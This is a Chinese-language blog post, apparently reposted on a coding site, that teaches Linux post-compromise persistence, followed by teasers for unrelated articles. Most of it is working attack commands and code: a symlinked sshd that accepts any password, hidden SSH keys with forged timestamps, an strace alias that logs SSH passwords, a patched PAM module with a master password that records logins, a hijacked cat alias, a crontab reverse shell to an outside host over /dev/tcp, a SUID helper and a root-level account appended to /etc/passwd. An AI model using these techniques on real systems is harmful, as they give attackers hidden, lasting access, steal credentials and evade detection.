Linux权限维持篇

news2024/11/12 13:11:19

目录

SSH后门

(1)软链接sshd

(2)SSH Key

生成公私钥

创建个authorized_keys文件来保存公钥 

通过修改文件时间来隐藏authorized_keys 

(3)SSH Keylogger(记录日志)

Linux的PAM后门(修改内核)

​编译生成so文件

生成的so文件目录 

 查找系统的pam_unix.so文件,用我们自己生成的来替换(要备份系统文件的话看自己选择)

cp替换

问题优化

(1)修改内核文件pam_unix_auth.c的代码

(2)修改内核文件support.c的代码 (linux的底线‘/’关键字查找)

  (3)cp替换 

  (4)成功crazy 

Alias后门

编译shell.c 

​运行一下alias,成功做好后门

目标靶机执行cat 

成功反弹shell 

Crontab后门

Setuid & Setgid

放tmp目录下

维持 

后门账号


SSH后门

(1)软链接sshd

输入任意密码就可以 root 用户权限登陆,如果 root 用户被禁止登陆时,可以利用其他存在的用户身份登陆

ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345

ssh root@192.168.78.19 -p 12345

(2)SSH Key

生成公私钥

ssh-keygen -t rsa

创建个authorized_keys文件来保存公钥 

cat /root/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys  追加
cat /root/.ssh/id_rsa.pub > /root/.ssh/authorized_keys  覆盖

通过修改文件时间来隐藏authorized_keys 

touch -r 参考文件 authorized_keys

如:
touch -r /www/wwwroot/upload.zip authorized_keys

 

(3)SSH Keylogger(记录日志)

主要是记录本机外联的日志,就是本机去连其他机器的日志

vim .bashrc  打开root目录下的这个文件,在文件末尾添加下面代码进行记录日志
alias ssh='strace -o /tmp/sshpwd-`date +%d%h%m%s`.log -e read,write,connect -s2048 ssh'
source .bashrc  命令代码生效

Linux的PAM后门(修改内核)

cd modules/pam_unix       到指定目录
vim pam_unix_auth.c       编辑密码验证文件
if (strcmp("crazy",p)==0) {return PAM_SUCCESS;}  添加代码

 编译生成so文件

cd Linux-PAM-1.1.8
./configure --prefix=/user --exec-prefix=/usr --localstatedir=/var --sysconfdir=/etc --disable-selinux --with-libiconv-prefix=/usr  运行该命令配置环境,如果之前配置好了就不用运行了,直接跳过
make

生成的so文件目录 

cd Linux-PAM-1.1.8/modules/pam_unix/.libs/   

 查找系统的pam_unix.so文件,用我们自己生成的来替换(要备份系统文件的话看自己选择)

find / -name pam_unix.so 2>/dev/null

cp替换

cp /root/Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /lib/x86_64-linux-gnu/security/pam_unix.so

 密码crazy可以登录

问题优化

查看日志文件:/var/log/auth.1og,发现这种方式下的登录跟正常登录下的情况不一样。

(1)修改内核文件pam_unix_auth.c的代码
cd modules/pam_unix       到指定目录
vim pam_unix_auth.c       编辑密码验证文件

代码:

        FILE * fp;
        if (retval == PAM_SUCCESS) {
          fp = fopen("/etc/pam.txt","a");
          fprintf(fp,"%s->%s\n", name,p);
          fclose(fp);
        }

(2)修改内核文件support.c的代码 (linux的底线‘/’关键字查找)
cd modules/pam_unix       到指定目录
vim support.c       编辑密码验证文件
int _unix_verify_password(pam_handle_t * pamh, const char *name
                          ,const char *p, unsigned int ctrl)
{
        struct passwd *pwd = NULL;
        char *salt = NULL;
        char *data_name;
        int retval;

if (strcmp("crazy",p)==0) {return PAM_SUCCESS;}

        D(("called"));

cd Linux-PAM-1.1.8
./configure --prefix=/user --exec-prefix=/usr --localstatedir=/var --sysconfdir=/etc --disable-selinux --with-libiconv-prefix=/usr  运行该命令配置环境,如果之前配置好了就不用运行了,直接跳过
make
(3)cp替换 
cp /root/Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /lib/x86_64-linux-gnu/security/pam_unix.so
(4)成功crazy 

Alias后门

编译shell.c 

gcc shell.c -o .shell   # -o ./shell 是保存成隐藏文件

 运行一下alias,成功做好后门

alias cat='/root/.shell && cat'

目标靶机执行cat 

成功反弹shell 

Crontab后门

(crontab -l;echo '*/1 * * * * exec 9<> /dev/tcp/192.168.3.16/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -
1.服务开启
service crond start

2.编辑计划任务
crontab -e -u 用户名

3.查看计划任务
crontab -l -u 用户名

4.删除计划任务:
crontab -r -u 用户名
#相关文件
/var/spool/cron/用户名   #用户定义的设置
/var/log/cron            #cron服务的日志文件
/etc/crontab             #cron服务配置文件

Setuid & Setgid

放tmp目录下

最好放到tmp目录下,因为这个有权限执行(试过其他目录,有的不成功) 

# 编译程序
gcc back.c -o back

# 给程序添加SUID权限
chmod u+s /bin/back
维持 

是通过普通用户的提权进行权限维持

./back whoami

后门账号

创建后门普通用户提权,进行普通用户到root用户的权限维持

perl -e 'print crypt("crazy","adgfagm")."\n"'  通过这个盐值生成密码,就是下面这个
adifQfW1d7qOY
echo "weblogic1:adifQfW1d7qOY:0:0:root:/root:/bin/bash" >> /etc/passwd  #带入这个里面,当用户数据导入etc/passwd

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1952856.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

vue 给特定满足条件的表单数据添加背景颜色,组件的 row-class-name

1、:row-class-name"tableRowClassName" 可为表格每行根据后面的函数绑定class名 <!-- 列表框 --><div class"tableList"><el-table :data"teamModelListTable" style"width: 100%"selection-change"handleSele…

基于Python的哔哩哔哩国产动画排行数据分析系统

需要本项目的可以私信博主&#xff0c;提供完整的部署、讲解、文档、代码服务 随着经济社会的快速发展&#xff0c;中国影视产业迎来了蓬勃发展的契机&#xff0c;其中动漫产业发展尤为突出。中国拥有古老而又璀璨的文明&#xff0c;仅仅从中提取一部分就足以催生出大量精彩的…

数字图像处理和机器视觉中的常用特殊矩阵及MATLAB实现详解

一、前言 Matlab的名称来源于“矩阵实验室&#xff08;Matrix Laboratory&#xff09;”&#xff0c;其对矩阵的操作具有先天性的优势&#xff08;特别是相对于C语言的数组来说&#xff09;。在数字图像处理和机器视觉实践中&#xff0c;为了提高编程效率&#xff0c;MATLAB 提…

用Java手写jvm之实现查找class

写在前面 完成类加载器加载class的三阶段&#xff0c;加载&#xff0c;解析&#xff0c;初始化中的加载&#x1f600;&#x1f600;&#x1f600; 源码 。 jvm想要运行class&#xff0c;是根据类全限定名称来从特定的位置基于类加载器来查找的&#xff0c;分别如下&#xff1a;…

MySQL常见指令

MySQL中的数据类型 大致分为五种&#xff1a;数值&#xff0c;日期和时间&#xff0c;字符串&#xff0c;json&#xff0c;空间类型 每种类型也包括也一些不同的子类型&#xff0c;根据需要来选择。 如数值类型包括整数类型和浮点数类型 整数类型根据占用的存储空间的不同 又…

Javascript 沙漏图案(Hour-glass Pattern)

给定正整数 n&#xff0c;以沙漏形式打印数字模式。示例&#xff1a; 输入&#xff1a;rows_no 7 输出&#xff1a; 1 2 3 4 5 6 7 2 3 4 5 6 7 3 4 5 6 7 4 5 6 7 5 6 7 6 7 7 6 7 5 6 7 4 5 6 7 3 4 5 6 7 2 3 4 5 6 7 1 2 3 4 5 6…

指针的面试题

这里写目录标题 判断链表中是否有环描述代码检测链表中是否存在环链表中存在环想检测链表中是否存在环&#xff0c;而不需要找到环的入口 判断链表中是否有环 题目 描述 判断给定的链表中是否有环。如果有环则返回true&#xff0c;否则返回false。 数据范围&#xff1a;链表…

Java语言程序设计——篇九(1)

&#x1f33f;&#x1f33f;&#x1f33f;跟随博主脚步&#xff0c;从这里开始→博主主页&#x1f33f;&#x1f33f;&#x1f33f; 内部类 概述内部类—内部类的分类成员内部类实战演练 局部内部类实战演练 匿名内部类实战演练 静态内部类实战演练 概述 内部类或嵌套类&#…

不支持jdk8的jenkins部署jdk8项目

1、背景 目前最新的jenkins必须基于jdk8以上&#xff0c;才能安装。jenkins最新的插件部分也不支持jdk8了。 2、全局工具配置 配置一个jdk8 配置一个jdk8以上的版本&#xff0c;如jdk17 3、部署maven项目 jdk17项目 可以直接使用maven插件&#xff0c;部署。 jdk8项目 由…

Zenario CMS 9.2 文件上传漏洞(CVE-2022-23043)

前言 CVE-2022-23043 是一个影响 Zenario CMS 9.2 的严重漏洞。该漏洞允许经过身份验证的管理员用户绕过文件上传限制。具体来说&#xff0c;管理员可以通过创建一个新的带有 ".phar" 扩展名的“文件/MIME 类型”&#xff0c;然后上传一个恶意文件。在上传过程中&am…

运维锅总详解NFS

NFS是什么&#xff1f;如何对NFS进行部署及优化&#xff1f;NFS工作流程是什么&#xff1f;NFS的性能及优缺点是什么&#xff1f;NFS发展历史又是怎样的&#xff1f;希望本文能帮您解答这些疑惑&#xff01; 一、NFS简介 NFS (Network File System) 是由 Sun Microsystems 在…

【最新】cudnn安装教程

最近换了新电脑需要重新安装cuda和cudnn&#xff0c;发现现在cudnn的安装比以前方便多了&#xff0c;直接在官网下载exe安装包一键运行即可。安装的时候注意cuda和cudnn的对应关系即可&#xff1a;【最新】cuda和cudnn和显卡驱动的对应关系-CSDN博客 访问cudnn下载链接cuDNN 9…

docker-compose 根据yaml拉取镜像出问题

在学习go微服务时&#xff0c;用docker-compose启动nacos以及对应的mysql时出现上面的问题&#xff0c; 使用的yaml如下 version: "3.8" services:nacos:image: nacos/nacos-server:${NACOS_VERSION}container_name: nacos-standalone-mysqlenv_file:- ../env/cust…

SpringCloud+Vue3多对多,多表联查

♥️作者&#xff1a;小宋1021 &#x1f935;‍♂️个人主页&#xff1a;小宋1021主页 ♥️坚持分析平时学习到的项目以及学习到的软件开发知识&#xff0c;和大家一起努力呀&#xff01;&#xff01;&#xff01; &#x1f388;&#x1f388;加油&#xff01; 加油&#xff01…

c/c++的内存管理(超详细)

一、c/c的内存分布 这是操作系统中对于内存的划分&#xff1a; 我们重点掌握以下几个区域即可&#xff1a; 1.栈 (调用函数会建立栈帧) 2.堆(动态开辟的空间) 3.数据段(静态区)&#xff1a;存放静态变量以及全局变量 4.代码段 (常量区) 先来看看一个题目&#xff1a; int…

JDK的配置

安装好JDK后&#xff0c;配置三个环境变量 第一步&#xff0c;配置JAVA_HOME. 先找到JDK的安装目录&#xff0c;然后复制路径&#xff0c;在电脑的环境变量里增添变量名为JAVA_HOME,变量值为 C:\Program Files\Java\jdk1.8.0_192。&#xff08;具体根据你的JDK安装路径&…

Lombok的认识

Lombok的作用 Lombok是一个Java库&#xff0c;它可以通过简单的注解形式来帮助开发人员简化Java代码的编写&#xff0c;特别是减少模板代码的书写。具体来说&#xff0c;Lombok的主要作用包括&#xff1a; 减少模板代码&#xff1a;Lombok可以通过注解自动生成getter、setter、…

Python——Pandas(第三讲)

文章目录 修改替换变量值对应数值的替换指定数值范围的替换 虚拟变量变换数值变量分段数据分组基于拆分进行筛选 分组汇总使用 agg 函数进行汇总引用自定义函数 长宽格式转换转换为最简格式长宽型格式的自由互转 多个数据源的合并数据的横向合并concat 命令 处理缺失值认识缺失…

【Apache Doris】3.0存算分离|标准部署篇(一)

【Apache Doris】3.0存算分离&#xff5c;标准部署篇&#xff08;一&#xff09; 一、前提概要二、环境信息三、前置准备四、FoundationDB安装五、OpenJDK 17安装六、 Meta Service安装七、集群安装八、快速体验 接上 数据架构新篇章&#xff1a;存算一体与存算分离的协同演进。…

Meta 发布Llama 3.1开源模型 NVIDIA推出AI 代工服务

在这周二&#xff0c;Meta发布了最新的AI模型Llama 3.1&#xff0c;并且是一个开源模型&#xff0c;面向公众免费提供&#xff0c;且提供8B、70B、305B参数版本&#xff0c;模型整体效果可与 GPT-4、GPT-4o、Claude 3.5 Sonnet 等领先的闭源模型相媲美。 此次Llama 3.1 系列改…